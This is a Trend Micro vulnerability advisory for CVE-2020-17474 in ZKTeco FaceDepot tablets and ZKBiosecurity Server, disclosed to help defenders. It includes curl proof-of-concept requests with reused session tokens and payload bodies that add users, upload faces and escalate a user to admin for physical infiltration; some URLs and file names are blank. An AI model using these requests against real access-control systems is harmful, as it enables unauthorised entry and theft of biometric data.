Trend Micro Security

ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 improper privilege vulnerability

  危険度: :
  CVE識別番号: CVE-2020-17474


A token-reuse vulnerability in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to create arbitrary new users, elevate users to administrators, delete users, and download user faces from the database.

The vulnerability has been submitted to ZDI on Dec 3, 2019.

ZDI got one response from the vendor which acknowledged but not confirmed the vulnerability. The responsible disclosure was expired on April 30, 2020.


ZKBiosecurity Server does not do client authentication except the long-lasting token (cf. CVE-2020-17473). One has to identify which FaceDepot tablet is allowed to register a new user by sniffing the network for a period of time. After obtaining the token of the tablet, one is able to

  1. Add a new arbitrary user (who may enter the office),
  2. Upload a new picture (allow an adversary to physically infiltrate),
  3. Delete an account (after a mission),
  4. Escalate the privilege of the new use user admin (able to operate / configure the tablet in front of it.)

Add a new user

curl -v -L -X POST -A 'iClock Proxy/1.09' '' \
    -b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
    -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN'

Where the content of is (tab separated):

user uuid=	cardno=	pin=11111	password=	group=1	starttime=0 	endtime=0	name=Bugoy	privilege=0	disable=0	verify=0

Upload a new picture to the server

curl -XPOST -A 'iClock Proxy/1.09' '' \
	-b 'token=8bd7f4495e0ac8781f4bba195827fcda' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
	-H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN'

The content of is a bit tricky, because the picture is in base64:

biophoto	pin=	filename=.jpg	type=	size=	content=

After a new picture is uploaded, wait until a scheduled time where all FaceDepot tablets are synchronized or when the admin clicks "Update" on the screen.

Escalate the privilege to admin

Users with "privilege=14" have the admin access to FaceDepot tablet. With the privilege, one can configure the tablet in front of it, to add users, set user privilege, delete users, browse user database, install APK via USB (exposed at the bottom of FaceDepot 7B), and switch to apps other than ZKTeco launcher.

curl -v -L -X POST -A 'iClock Proxy/1.09' '' \
    -b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
    -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN'

Where the content of is (tab separated):

user uuid=2645	cardno=	pin=12345	password=	group=1	starttime=0 	endtime=0	name=Bugoy	privilege=14	disable=0	verify=0

Vulnerability Type
CWE-269: Improper Privilege Management

Attack Type: Remote

Impact Information Disclosure: True

Attack Vectors
The attacker must have access to LAN and use cURL to send HTTP GET/POST.
The attack can be conducted by calling API commands with a long-lasting token.

Deploy a firewall in front of ZKBiosecurity Server and enforce allowed IP list and allowed MAC list.
Deny all unlisted access.

Discoverer: Roel Reyes, Joey Costoya, Philippe Lin, Vincenzo Ciancaglini, Morton Swimmer
